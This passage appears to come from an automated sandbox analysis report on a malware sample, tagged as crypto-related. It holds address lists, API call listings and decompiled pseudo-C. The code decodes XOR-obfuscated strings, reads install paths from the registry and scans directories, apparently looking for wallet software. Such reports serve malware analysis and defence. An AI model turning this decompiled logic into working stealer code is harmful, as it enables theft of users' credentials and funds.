                                    0x00824e8a
                                    0x00824e8a
                                    0x00824e8c
                                    0x00824e8c
                                    0x00824e93
                                    0x00824e94
                                    0x00000000
                                    0x00824e8c
                                    0x00824e05
                                    0x00824e05
                                    0x00824e07
                                    0x00824e07
                                    0x00824e0e
                                    0x00824e0f
                                    0x00000000
                                    0x00824e07
                                    0x00824d81
                                    0x00824d81
                                    0x00824d83
                                    0x00824d83
                                    0x00824d8a
                                    0x00824d8b
                                    0x00000000
                                    0x00824d83
                                    0x00824cf6
                                    0x00824cf6
                                    0x00824cf8
                                    0x00824cf8
                                    0x00824cff
                                    0x00824d00
                                    0x00000000
                                    0x00824cf8
                                    0x00824c63
                                    0x00824c63
                                    0x00824c65
                                    0x00824c65
                                    0x00824c6c
                                    0x00824c6d
                                    0x00000000
                                    0x00824c65
                                    0x00824bcd
                                    0x00824bcd
                                    0x00824bcf
                                    0x00824bcf
                                    0x00824bd6
                                    0x00824bd7
                                    0x00000000
                                    0x00824bcf
                                    0x00824b3a
                                    0x00824b3a
                                    0x00824b3c
                                    0x00824b3c
                                    0x00824b43
                                    0x00824b44
                                    0x00000000
                                    0x00824b3c
                                    0x00824aa7
                                    0x00824aa7
                                    0x00824aa9
                                    0x00824aa9
                                    0x00824ab0
                                    0x00824ab1
                                    0x00000000
                                    0x00824aa9
                                    0x00824a1c
                                    0x00824a1c
                                    0x00824a1e
                                    0x00824a1e
                                    0x00824a25
                                    0x00824a26
                                    0x00000000
                                    0x00824a1e
                                    0x00824992
                                    0x00824992
                                    0x00824994
                                    0x00824994
                                    0x0082499b
                                    0x0082499c
                                    0x00000000
                                    0x00824994
                                    0x008248ff
                                    0x008248ff
                                    0x00824901
                                    0x00824901
                                    0x00824908
                                    0x00824909
                                    0x00000000
                                    0x00824901
                                    0x0082486c
                                    0x0082486c
                                    0x0082486e
                                    0x0082486e
                                    0x00824875
                                    0x00824876
                                    0x00000000
                                    0x0082486e
                                    0x008247e3
                                    0x008247e3
                                    0x008247e5
                                    0x008247e5
                                    0x008247ec
                                    0x008247ed
                                    0x00000000
                                    0x008247e5
                                    0x00824755
                                    0x00824755
                                    0x00824757
                                    0x00824757
                                    0x0082475e
                                    0x0082475f
                                    0x00000000
                                    0x00824757
                                    0x008246c7
                                    0x008246c7
                                    0x008246c9
                                    0x008246c9
                                    0x008246d0
                                    0x008246d1
                                    0x00000000
                                    0x008246c9
                                    0x00824634
                                    0x00824634
                                    0x00824636
                                    0x00824636
                                    0x0082463d
                                    0x0082463e
                                    0x00000000
                                    0x00824636
                                    0x008245ae
                                    0x008245ae
                                    0x008245b0
                                    0x008245b0
                                    0x008245b7
                                    0x008245b8
                                    0x00000000
                                    0x008245b0
                                    0x00824524
                                    0x00824524
                                    0x00824526
                                    0x00824526
                                    0x0082452d
                                    0x0082452e
                                    0x00000000
                                    0x00824526
                                    0x00824499
                                    0x00824499
                                    0x0082449b
                                    0x0082449b
                                    0x008244a2
                                    0x008244a3
                                    0x00000000
                                    0x0082449b
                                    0x00824416
                                    0x00824416
                                    0x00824418
                                    0x00824418
                                    0x0082441f
                                    0x00824420
                                    0x00000000
                                    0x00824418
                                    0x0082438a
                                    0x0082438a
                                    0x0082438c
                                    0x0082438c
                                    0x00824390
                                    0x00824391
                                    0x00000000
                                    0x0082438c
                                    0x00824358
                                    0x00824358
                                    0x0082435a
                                    0x0082435a
                                    0x00824361
                                    0x00824362
                                    0x00000000
                                    0x0082435a
                                    0x0082429b
                                    0x0082429b
                                    0x0082429d
                                    0x0082429d
                                    0x008242a1
                                    0x008242a2
                                    0x008242a2
                                    0x00000000
                                    0x0082429d
                                    0x008240df
                                    0x008240df
                                    0x008240e1
                                    0x008240e1
                                    0x008240e8
                                    0x008240e9
                                    0x008240e9
                                    0x00000000
                                    0x008240e1
                                    0x00824065
                                    0x00824065
                                    0x00824067
                                    0x00824067
                                    0x0082406e
                                    0x0082406f
                                    0x0082406f
                                    0x00000000
                                    0x00824067
                                    0x00823fe3
                                    0x00823fe3
                                    0x00823fe5
                                    0x00823fe5
                                    0x00823fec
                                    0x00823fed
                                    0x00823fed
                                    0x00000000
                                    0x00823fe5
                                    0x00823f5a
                                    0x00823f5a
                                    0x00823f5c
                                    0x00823f5c
                                    0x00823f63
                                    0x00823f64
                                    0x00823f64
                                    0x00000000
                                    0x00823f5c

                                    APIs
                                      • Part of subcall function 00872C70: QueryPerformanceCounter.KERNEL32(?), ref: 00872C8B
                                    • GetModuleHandleA.KERNEL32(00000000,?,00000104), ref: 00823EE2
                                    • GetModuleFileNameA.KERNEL32(00000000), ref: 00823EE9
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeaveModule$ConditionCounterDeallocateFileHandleNamePerformanceQueryVariableWake
                                    • String ID: sec.$)$.$.$hGBK$kmz{$mO\J$mac~{zk|`ock.$tMO]$xuinya$|k$}ZKO$~
                                    • API String ID: 3852128730-1379014052
                                    • Opcode ID: c3d50ebad667946c4fd4a497b87367c053ae33a8052ee5e8f4748ecf8ab00a9e
                                    • Instruction ID: 70affd43c6fd4baedeb5245b82daa2a8b85a13fcc2f2d0d0d3bc9261da7cd45d
                                    • Opcode Fuzzy Hash: c3d50ebad667946c4fd4a497b87367c053ae33a8052ee5e8f4748ecf8ab00a9e
                                    • Instruction Fuzzy Hash: 2C23D230D006A88EDB15EB68E946BEDBBB0FF55300F144099E159FB292EB745EC4CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00823095 Relevance: 22.1, Strings: 17, Instructions: 872COMMONCrypto
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 1989 823095-8230c6 call 890cfc call 82ea7d 1994 8232ec 1989->1994 1995 8230cc-82311a call 823dfb call 82d2ae call 82da74 1989->1995 1997 8232f3-82331f 1994->1997 2015 823155-82315c 1995->2015 2016 82311c-82312e call 86db91 1995->2016 1999 823321-823334 call 86db91 1997->1999 2000 823356-82335d 1997->2000 1999->2000 2009 823336-823355 call 82d0b8 call 86dfe8 call 86db47 1999->2009 2001 82336e-8233b9 call 82e8c7 call 82fec9 call 813174 call 82dd77 2000->2001 2002 82335f 2000->2002 2038 823dea 2001->2038 2039 8233bf-8233dc call 82e0ab call 822c33 2001->2039 2005 823361-82336c 2002->2005 2005->2001 2005->2005 2009->2000 2021 82315e 2015->2021 2022 82316d-823187 call 82da74 call 82bb72 2015->2022 2016->2015 2030 823130-823154 call 82d132 call 86dfe8 call 86db47 2016->2030 2027 823160-82316b 2021->2027 2037 82318c-8231a2 call 82ea7d 2022->2037 2027->2022 2027->2027 2030->2015 2047 8232da 2037->2047 2048 8231a8-8231f1 call 82dfe8 2037->2048 2039->2038 2056 8233e2-82348d call 82fec9 call 812e70 call 82dd77 call 81a25a * 2 2039->2056 2053 8232df-8232ea call 82df41 2047->2053 2058 8231f3-823206 call 86db91 2048->2058 2059 823228-82322f 2048->2059 2053->1997 2093 823494 2056->2093 2094 82348f call 8116cb 2056->2094 2058->2059 2071 823208-823227 call 82d0f5 call 86dfe8 call 86db47 2058->2071 2062 823240-823289 call 82e9ec call 82e917 call 82bb72 2059->2062 2063 823231 2059->2063 2086 82328b-823294 call 82e143 2062->2086 2087 823299-8232c1 call 82df41 * 2 call 82ea7d 2062->2087 2066 823233-82323e 2063->2066 2066->2062 2066->2066 2071->2059 2086->2087 2087->2053 2113 8232c3-8232d9 call 82df41 2087->2113 2098 823498-82349a 2093->2098 2094->2093 2100 8234a0-8234a9 call 812a7c 2098->2100 2101 823dc5-823dc7 2098->2101 2114 823da9-823dc0 call 812ebb 2100->2114 2115 8234af-8234ee call 82e5d4 call 82df41 2100->2115 2104 823dd0-823dd8 2101->2104 2105 823dc9-823dcb call 8116cb 2101->2105 2106 823dda call 8116cb 2104->2106 2107 823ddf-823de5 call 82df41 2104->2107 2105->2104 2106->2107 2107->2038 2114->2098 2115->2114 2125 8234f4-8235bf call 82e5d4 call 82fec9 call 812e70 call 82dd77 call 82df41 call 81a25a * 2 2115->2125 2140 8235c1 call 8116cb 2125->2140 2141 8235c6 2125->2141 2140->2141 2143 8235ca-8235cc 2141->2143 2144 8235d2-8235db call 812a7c 2143->2144 2145 823d8b-823d8d 2143->2145 2152 8235e1-823612 2144->2152 2153 823d6f-823d86 call 812ebb 2144->2153 2147 823d96-823da2 2145->2147 2148 823d8f-823d91 call 8116cb 2145->2148 2147->2114 2151 823da4 call 8116cb 2147->2151 2148->2147 2151->2114 2156 823650-823657 2152->2156 2157 823614-823626 call 86db91 2152->2157 2153->2143 2158 823668-8236bb call 8123eb call 82e5d4 call 82ea7d call 82df41 call 82dd77 2156->2158 2159 823659 2156->2159 2157->2156 2166 823628-82364f call 86dfe8 call 86db47 2157->2166 2158->2153 2179 8236c1-8236f2 call 82e5d4 call 818e25 2158->2179 2162 82365b-823666 2159->2162 2162->2158 2162->2162 2166->2156 2184 823701-823707 call 82df41 2179->2184 2185 8236f4-8236fc call 82e143 2179->2185 2188 82370c-82373c 2184->2188 2185->2184 2189 823777-82377e 2188->2189 2190 82373e-823751 call 86db91 2188->2190 2191 823780 2189->2191 2192 82378f-8237a3 call 82d960 2189->2192 2190->2189 2198 823753-823776 call 86dfe8 call 86db47 2190->2198 2194 823782-82378d 2191->2194 2192->2153 2199 8237a9-8237de 2192->2199 2194->2192 2194->2194 2198->2189 2201 8237e0-8237f3 call 86db91 2199->2201 2202 823815-82381c 2199->2202 2201->2202 2213 8237f5-823814 call 82d1e6 call 86dfe8 call 86db47 2201->2213 2204 82381e 2202->2204 2205 82382d-8238ad call 82e9ec call 82e917 call 82d9e5 call 82df41 * 2 2202->2205 2208 823820-82382b 2204->2208 2228 8238e8-8238ef 2205->2228 2229 8238af-8238c2 call 86db91 2205->2229 2208->2205 2208->2208 2213->2202 2231 823900-823977 call 82d960 call 82dfa2 call 82da01 call 82d960 call 82d8d6 2228->2231 2232 8238f1 2228->2232 2229->2228 2236 8238c4-8238e7 call 86dfe8 call 86db47 2229->2236 2250 8239b2-8239b9 2231->2250 2251 823979-82398b call 86db91 2231->2251 2234 8238f3-8238fe 2232->2234 2234->2231 2234->2234 2236->2228 2253 8239ca-823a44 call 82ea3d call 82e917 call 82d9e5 call 82df41 * 3 2250->2253 2254 8239bb 2250->2254 2251->2250 2259 82398d-8239b1 call 86dfe8 call 86db47 2251->2259 2274 823a46-823a59 call 86db91 2253->2274 2275 823a7b-823a82 2253->2275 2257 8239bd-8239c8 2254->2257 2257->2253 2257->2257 2259->2250 2274->2275 2282 823a5b-823a7a call 82d1a9 call 86dfe8 call 86db47 2274->2282 2276 823a93-823b16 call 82d960 call 82dfa2 call 82da01 call 82d960 call 82d8d6 call 822f89 2275->2276 2277 823a84 2275->2277 2300 823b52-823b59 2276->2300 2301 823b18-823b2a call 86db91 2276->2301 2279 823a86-823a91 2277->2279 2279->2276 2279->2279 2282->2275 2302 823b6a-823be7 call 82ea3d call 82e917 call 82d9e5 call 82df41 * 3 2300->2302 2303 823b5b 2300->2303 2301->2300 2309 823b2c-823b51 call 86dfe8 call 86db47 2301->2309 2324 823be9-823bfc call 86db91 2302->2324 2325 823c1e-823c25 2302->2325 2305 823b5d-823b68 2303->2305 2305->2302 2305->2305 2309->2300 2324->2325 2332 823bfe-823c1d call 82d1a9 call 86dfe8 call 86db47 2324->2332 2327 823c36-823cb7 call 82d960 call 82dfa2 call 82da01 call 82d960 call 82d8d6 call 822f89 2325->2327 2328 823c27 2325->2328 2350 823cf2-823cf9 2327->2350 2351 823cb9-823ccb call 86db91 2327->2351 2330 823c29-823c34 2328->2330 2330->2327 2330->2330 2332->2325 2352 823d0a-823d6a call 82ea3d call 82e917 call 82d9e5 call 82df41 * 3 2350->2352 2353 823cfb 2350->2353 2351->2350 2359 823ccd-823cf1 call 86dfe8 call 86db47 2351->2359 2352->2188 2355 823cfd-823d08 2353->2355 2355->2352 2355->2355 2359->2350
                                    C-Code - Quality: 78%
                                    			E00823095(void* __ebx, void* __ecx, void* __edx, void* __eflags) {
				void* __edi;
				void* __esi;
				signed int _t284;
				signed int _t287;
				void* _t289;
				signed int _t291;
				signed int _t309;
				void* _t329;
				signed int _t331;
				void* _t336;
				void* _t338;
				void* _t340;
				void* _t341;
				void* _t342;
				intOrPtr _t346;
				void* _t349;
				intOrPtr _t354;
				void* _t356;
				intOrPtr _t361;
				void* _t364;
				intOrPtr* _t368;
				intOrPtr _t369;
				void* _t371;
				intOrPtr _t376;
				void* _t379;
				signed int _t383;
				intOrPtr _t384;
				void* _t385;
				void* _t386;
				signed int _t391;
				signed int _t395;
				signed int _t401;
				signed int _t405;
				signed int _t411;
				signed int _t415;
				signed int _t419;
				signed int _t425;
				signed int _t430;
				signed int _t436;
				intOrPtr _t445;
				intOrPtr _t451;
				void* _t453;
				void* _t455;
				signed int _t460;
				signed int _t466;
				intOrPtr* _t478;
				intOrPtr* _t479;
				signed int _t483;
				void* _t490;
				void* _t492;
				void* _t494;
				signed int _t503;
				void* _t507;
				void* _t510;
				signed int _t521;
				void* _t526;
				void* _t530;
				void* _t538;
				void* _t541;
				void* _t551;
				void* _t554;
				void* _t565;
				void* _t568;
				void* _t580;
				void* _t584;
				void* _t588;
				void* _t595;
				char* _t607;
				void* _t645;
				signed int* _t646;
				signed int _t648;
				void* _t656;
				intOrPtr* _t659;
				signed int _t666;
				void* _t668;
				void* _t670;
				intOrPtr _t671;
				void* _t673;
				intOrPtr* _t674;
				intOrPtr _t675;
				void* _t676;
				intOrPtr* _t677;
				signed int _t678;
				intOrPtr* _t679;
				void* _t680;
				char* _t681;
				void* _t682;

				L00890CFC(0x89316c, __ebx, __ecx, __edx);
				_t671 = _t670 - 0x154;
				_push(__ebx);
				_push(_t645);
				 *((intOrPtr*)(_t668 - 0x10)) = _t671;
				_t656 = 0x8b29b4;
				 *(_t668 - 0x18) = 0;
				 *((intOrPtr*)(_t668 - 4)) = 0;
				if(E0082EA7D(0x8b29b4, 0x8a43ab, _t645, 0x8b29b4) == 0) {
					_t646 =  *[fs:0x2c];
					goto L22;
				} else {
					_t679 = _t671 - 0x18;
					 *((intOrPtr*)(_t668 - 0x34)) = _t679;
					E0082DA74(_t679, E0082D2AE(L00823DFB()));
					 *((char*)(_t668 - 4)) = 1;
					_t646 =  *[fs:0x2c];
					asm("movaps xmm0, [0x8a8fa0]");
					_t445 =  *0x8b5dc0; // 0x80000034
					asm("movups [ebp-0x58], xmm0");
					_t666 =  *_t646;
					asm("movaps xmm0, [0x8a8fe0]");
					asm("movups [ebp-0x48], xmm0");
					 *((char*)(_t668 - 0x38)) = 0x2e;
					if(_t445 >  *((intOrPtr*)(_t666 + 4))) {
						E0086DB91(_t445, 0x8b5dc0);
						_t686 =  *0x8b5dc0 - 0xffffffff;
						if( *0x8b5dc0 == 0xffffffff) {
							E0082D132(0x8b50c8, _t668 - 0x58);
							L0086DFE8(0x8b50c8, _t686, 0x895dce);
							 *_t679 = 0x8b5dc0;
							L0086DB47();
						}
					}
					if( *0x8b50e8 == 0) {
						L7:
						_t680 = _t679 - 0x18;
						E0082DA74(_t680, 0x8b50c8);
						 *((char*)(_t668 - 4)) = 0;
						E0082BB72(0, _t668 - 0x30, 0x80000002); // executed
						_t671 = _t680 + 0x30;
						 *((char*)(_t668 - 4)) = 2;
						if(E0082EA7D(_t668 - 0x30, 0x8a43ab, _t646, _t666) != 0) {
							_t656 = 0x8b29b4;
							goto L20;
						} else {
							_t681 = _t671 - 0x18;
							_t607 = _t681;
							 *((intOrPtr*)(_t668 - 0x34)) = _t681;
							 *((intOrPtr*)(_t607 + 0x10)) = 0;
							 *((intOrPtr*)(_t607 + 0x14)) = 0xf;
							 *_t607 = 0;
							L0082DFE8("Install Directory");
							 *((char*)(_t668 - 4)) = 3;
							asm("movaps xmm0, [0x8a8fa0]");
							_t451 =  *0x8b59cc; // 0x0
							asm("movups [ebp-0x58], xmm0");
							 *((short*)(_t668 - 0x38)) = 0x2e72;
							asm("movaps xmm0, [0x8a8fe0]");
							asm("movups [ebp-0x48], xmm0");
							if(_t451 >  *((intOrPtr*)(_t666 + 4))) {
								E0086DB91(_t451, 0x8b59cc);
								_t691 =  *0x8b59cc - 0xffffffff;
								if( *0x8b59cc == 0xffffffff) {
									E0082D0F5(0x8b5ca4, _t668 - 0x58);
									L0086DFE8(0x8b5ca4, _t691, 0x895dad);
									L0086DB47(0x8b59cc);
								}
							}
							if( *0x8b5cc5 == 0) {
								L14:
								_push(_t668 - 0x30);
								_t453 = E0082E9EC(0, _t668 - 0xf0, 0x8b5ca4);
								_t682 = _t681 - 0x18;
								 *((char*)(_t668 - 4)) = 4;
								E0082E917(_t682, _t453, _t693, "\\Main");
								 *((char*)(_t668 - 4)) = 5;
								_t455 = E0082BB72(0, _t668 - 0xd8, 0x80000002);
								_t656 = 0x8b29b4;
								_t671 = _t682 + 0x30;
								if(_t455 != 0x8b29b4) {
									 *(_t668 - 0x14) = 0;
									_push( *(_t668 - 0x14));
									E0082E143(0x8b29b4, _t455);
								}
								E0082DF41(_t668 - 0xd8);
								 *((char*)(_t668 - 4)) = 2;
								E0082DF41(_t668 - 0xf0);
								if(E0082EA7D(_t656, 0x8a43ab, _t646, _t656) == 0) {
									L20:
									 *((char*)(_t668 - 4)) = 0;
									E0082DF41(_t668 - 0x30);
									L22:
									_t483 =  *_t646;
									asm("movaps xmm0, [0x8a8ff0]");
									_t284 =  *0x8b518c; // 0x80000035
									asm("movups [ebp-0x50], xmm0");
									 *((intOrPtr*)(_t668 - 0x40)) = 0x415c7e72;
									 *((intOrPtr*)(_t668 - 0x3c)) = 0x4b424748;
									 *((short*)(_t668 - 0x38)) = 0x2e5d;
									__eflags = _t284 -  *((intOrPtr*)(_t483 + 4));
									if(_t284 >  *((intOrPtr*)(_t483 + 4))) {
										_t646 = 0x8b518c;
										E0086DB91(_t284, 0x8b518c);
										__eflags =  *0x8b518c - 0xffffffff;
										if( *0x8b518c == 0xffffffff) {
											E0082D0B8(0x8b5b24, _t668 - 0x50);
											L0086DFE8(0x8b5b24, __eflags, 0x895d9c);
											L0086DB47(0x8b518c);
										}
									}
									__eflags =  *0x8b5b3d;
									if( *0x8b5b3d == 0) {
										L28:
										_push(0x8b5b24);
										E0082E8C7(0, _t668 - 0x160, 0x8b29cc, _t646);
										 *(_t668 - 0x14) = 0;
										_t627 = _t668 - 0x160;
										_push( *(_t668 - 0x14));
										 *((char*)(_t668 - 4)) = 6;
										L0082FEC9(_t668 - 0x160);
										 *((char*)(_t668 - 4)) = 7;
										_t287 = E00813174(0, _t668 - 0x30, _t646);
										 *((char*)(_t668 - 4)) = 6;
										_t474 = _t287;
										L0082DD77(_t668 - 0x30);
										__eflags = _t287;
										if(_t287 == 0) {
											L112:
											_t490 = _t668 - 0x160;
											goto L18;
										}
										_t673 = _t671 - 0x18;
										_t492 = _t673;
										 *(_t492 + 0x10) =  *(_t492 + 0x10) & 0x00000000;
										 *(_t492 + 0x14) =  *(_t492 + 0x14) & 0x00000000;
										E0082E0AB(_t492, _t656);
										_t291 = L00822C33(_t474, _t492, _t627);
										_t674 = _t673 + 0x18;
										__eflags = _t291;
										if(_t291 == 0) {
											goto L112;
										}
										 *(_t668 - 0xa8) =  *(_t668 - 0xa8) & 0x00000000;
										 *((intOrPtr*)(_t668 - 0xa4)) = 0xf;
										 *((char*)(_t668 - 0xb8)) = 0;
										 *(_t668 - 0x14) = 0;
										_push( *(_t668 - 0x14));
										 *((char*)(_t668 - 4)) = 8;
										L0082FEC9(_t668 - 0x160);
										_pop(_t494);
										 *((char*)(_t668 - 4)) = 9;
										L00812E70(_t474, _t668 - 0x110, _t668 - 0x160, _t646, _t656, _t668 - 0x30, _t494);
										L0082DD77(_t668 - 0x30);
										E0081A25A(_t668 - 0xc0, _t668 - 0x110);
										_t648 =  *(_t668 - 0xc0);
										_t658 =  *(_t668 - 0xbc);
										 *(_t668 - 0x108) = _t648;
										 *(_t668 - 0x104) = _t658;
										E0081A25A(_t668 - 0x128, _t668 - 0x110);
										_t499 =  *(_t668 - 0x124);
										asm("xorps xmm0, xmm0");
										asm("movlpd [ebp-0x118], xmm0");
										 *(_t668 - 0x118) =  *(_t668 - 0x118) & 0x00000000;
										 *(_t668 - 0x114) =  *(_t668 - 0x114) & 0x00000000;
										__eflags =  *(_t668 - 0x124);
										if( *(_t668 - 0x124) != 0) {
											E008116CB(_t499);
										}
										 *((char*)(_t668 - 4)) = 0xd;
										while(1) {
											__eflags = _t648;
											if(_t648 == 0) {
												break;
											}
											_t503 = _t648;
											__eflags = E00812A7C(_t474, _t503, _t648) - 1;
											if(__eflags != 0) {
												L106:
												E00812EBB(_t474, _t668 - 0x108, _t648, _t658, __eflags);
												_t658 =  *(_t668 - 0x104);
												_t648 =  *(_t668 - 0x108);
												continue;
											}
											_t659 =  *0x8b486c; // 0x0
											E0082E5D4(_t648 + 0x20, _t668 - 0x30);
											_t474 =  *(_t668 - 0x18) | 0x00000010;
											 *(_t668 - 0x18) = _t474;
											 *((char*)(_t668 - 4)) = 0xe;
											__eflags =  *((intOrPtr*)(_t668 - 0x1c)) - 0x10;
											_t308 =  >=  ?  *((void*)(_t668 - 0x30)) : _t668 - 0x30;
											_t309 =  *_t659( >=  ?  *((void*)(_t668 - 0x30)) : _t668 - 0x30, _t503);
											_t507 = _t668 - 0x30;
											 *((char*)(_t668 - 4)) = 0xd;
											_t658 = _t309;
											E0082DF41(_t507);
											__eflags = _t309;
											if(__eflags != 0) {
												goto L106;
											}
											_push(_t507);
											E0082E5D4(_t648 + 0x20, _t668 - 0xd8);
											 *(_t668 - 0x18) = _t474 | 0x00000080;
											 *((char*)(_t668 - 0x9c)) = 0;
											_push( *((intOrPtr*)(_t668 - 0x9c)));
											 *((char*)(_t668 - 4)) = 0xf;
											L0082FEC9(_t668 - 0xd8);
											_pop(_t510);
											 *((char*)(_t668 - 4)) = 0x10;
											L00812E70(_t474 | 0x00000080, _t668 - 0xc0, _t668 - 0xd8, _t648, _t658, _t668 - 0x30, _t510);
											L0082DD77(_t668 - 0x30);
											E0082DF41(_t668 - 0xd8);
											E0081A25A(_t668 - 0xf8, _t668 - 0xc0);
											_t474 =  *(_t668 - 0xf8);
											_t658 =  *(_t668 - 0xf4);
											 *(_t668 - 0xf8) =  *(_t668 - 0xf8) & 0x00000000;
											 *(_t668 - 0xf4) =  *(_t668 - 0xf4) & 0x00000000;
											 *(_t668 - 0x100) = _t474;
											 *(_t668 - 0xfc) = _t658;
											E0081A25A(_t668 - 0x130, _t668 - 0xc0);
											_t516 =  *(_t668 - 0x12c);
											asm("xorps xmm0, xmm0");
											asm("movlpd [ebp-0x120], xmm0");
											 *(_t668 - 0x120) =  *(_t668 - 0x120) & 0x00000000;
											 *(_t668 - 0x11c) =  *(_t668 - 0x11c) & 0x00000000;
											__eflags =  *(_t668 - 0x12c);
											if( *(_t668 - 0x12c) != 0) {
												E008116CB(_t516);
											}
											 *((char*)(_t668 - 4)) = 0x15;
											while(1) {
												__eflags = _t474;
												if(_t474 == 0) {
													break;
												}
												__eflags = E00812A7C(_t474, _t474, _t648);
												if(__eflags != 0) {
													L101:
													E00812EBB(_t474, _t668 - 0x100, _t648, _t658, __eflags);
													_t658 =  *(_t668 - 0xfc);
													_t474 =  *(_t668 - 0x100);
													continue;
												}
												 *((intOrPtr*)(_t668 - 0x88)) = 0x47494142;
												 *((intOrPtr*)(_t668 - 0x84)) = 0x44005d40;
												 *((intOrPtr*)(_t668 - 0x80)) = 0x2e40415d;
												_t648 =  *( *[fs:0x2c]);
												_t327 =  *0x8b60cc;
												 *(_t668 - 0x14) = _t648;
												__eflags =  *0x8b60cc -  *((intOrPtr*)(_t648 + 4));
												if( *0x8b60cc >  *((intOrPtr*)(_t648 + 4))) {
													E0086DB91(_t327, 0x8b60cc);
													__eflags =  *0x8b60cc - 0xffffffff;
													_pop(_t595);
													if(__eflags == 0) {
														asm("movsd");
														asm("movsd");
														asm("movsd");
														L0086DFE8(_t595, __eflags, 0x895d8f);
														 *_t674 = 0x8b60cc;
														L0086DB47();
														_t648 =  *(_t668 - 0x14);
													}
												}
												__eflags =  *0x8b6113;
												if( *0x8b6113 == 0) {
													L47:
													_t658 = _t474 + 0x20;
													_t521 = _t474 + 0x20;
													_t329 = E008123EB(_t521, _t668 - 0x30);
													_push(_t521);
													 *((char*)(_t668 - 4)) = 0x16;
													E0082E5D4(_t329, _t668 - 0xd8);
													 *(_t668 - 0x18) =  *(_t668 - 0x18) | 0x00001000;
													_t331 = E0082EA7D(_t668 - 0xd8, 0x8b6108, _t648, _t474 + 0x20);
													_t474 = _t331;
													E0082DF41(_t668 - 0xd8);
													_t526 = _t668 - 0x30;
													 *((char*)(_t668 - 4)) = 0x15;
													L0082DD77(_t526);
													__eflags = _t331;
													if(__eflags == 0) {
														goto L101;
													}
													_t675 = _t674 - 0x18;
													 *((intOrPtr*)(_t668 - 0xa0)) = _t675;
													_push(_t526);
													E0082E5D4(_t658, _t675);
													 *(_t668 - 0x18) =  *(_t668 - 0x18) | 0x00008000;
													_t336 = E00818E25(_t474, _t668 - 0xd8, 0x8b6108);
													_t529 = _t668 - 0xb8;
													_t674 = _t675 + 0x18;
													__eflags = _t668 - 0xb8 - _t336;
													if(_t668 - 0xb8 != _t336) {
														 *((char*)(_t668 - 0x34)) = 0;
														_push( *((intOrPtr*)(_t668 - 0x34)));
														E0082E143(_t529, _t336);
													}
													_t530 = _t668 - 0xd8;
													E0082DF41(_t530);
													while(1) {
														_t338 =  *0x8b55b0; // 0x0
														 *(_t668 - 0x98) = 0x5d41460c;
														 *((intOrPtr*)(_t668 - 0x94)) = 0x434f405a;
														 *((intOrPtr*)(_t668 - 0x90)) = 0xc140c4b;
														 *((char*)(_t668 - 0x8c)) = 0x2e;
														__eflags = _t338 -  *((intOrPtr*)(_t648 + 4));
														if(_t338 >  *((intOrPtr*)(_t648 + 4))) {
															_t474 = 0x8b55b0;
															E0086DB91(_t338, 0x8b55b0);
															__eflags =  *0x8b55b0 - 0xffffffff;
															_pop(_t530);
															if(__eflags == 0) {
																_t658 = _t668 - 0x98;
																asm("movsd");
																asm("movsd");
																asm("movsd");
																asm("movsb");
																L0086DFE8(_t530, __eflags, 0x895d81);
																L0086DB47(0x8b55b0);
																_t648 =  *(_t668 - 0x14);
																_pop(_t530);
															}
														}
														__eflags =  *0x8b5648;
														if( *0x8b5648 == 0) {
															goto L57;
														}
														L55:
														_t425 = 0;
														__eflags = 0;
														do {
															 *(_t425 + 0x8b563c) =  *(_t425 + 0x8b563c) ^ 0x0000002e;
															_t425 = _t425 + 1;
															__eflags = _t425 - 0xd;
														} while (_t425 < 0xd);
														L57:
														_push(_t530);
														__eflags = E0082D960(_t668 - 0xb8, 0x8b563c) - 0xffffffff;
														if(__eflags == 0) {
															goto L101;
														}
														asm("movaps xmm0, [0x8a8f70]");
														_t340 =  *0x8b56b0; // 0x0
														asm("movups [ebp-0x58], xmm0");
														 *((intOrPtr*)(_t668 - 0x48)) = 0x73564168;
														 *((intOrPtr*)(_t668 - 0x44)) = 0x750e030e;
														 *((intOrPtr*)(_t668 - 0x40)) = 0x5c4b5d5b;
														 *((short*)(_t668 - 0x3c)) = 0xe14;
														 *((char*)(_t668 - 0x3a)) = 0x2e;
														__eflags = _t340 -  *((intOrPtr*)(_t648 + 4));
														if(_t340 >  *((intOrPtr*)(_t648 + 4))) {
															_t474 = 0x8b56b0;
															E0086DB91(_t340, 0x8b56b0);
															__eflags =  *0x8b56b0 - 0xffffffff;
															if( *0x8b56b0 == 0xffffffff) {
																E0082D1E6(0x8b5c04, _t668 - 0x58);
																L0086DFE8(0x8b5c04, __eflags, 0x895d6f);
																L0086DB47(0x8b56b0);
															}
														}
														__eflags =  *0x8b5c22;
														if( *0x8b5c22 == 0) {
															L64:
															_push(0x8b2abc);
															_t341 = E0082E9EC(_t474, _t668 - 0x30, 0x8b5c04);
															 *((char*)(_t668 - 4)) = 0x17;
															_t342 = E0082E917(_t668 - 0xd8, _t341, __eflags, "]\n|\n");
															 *((char*)(_t668 - 4)) = 0x18;
															E0082D9E5(_t342);
															E0082DF41(_t668 - 0xd8);
															_t538 = _t668 - 0x30;
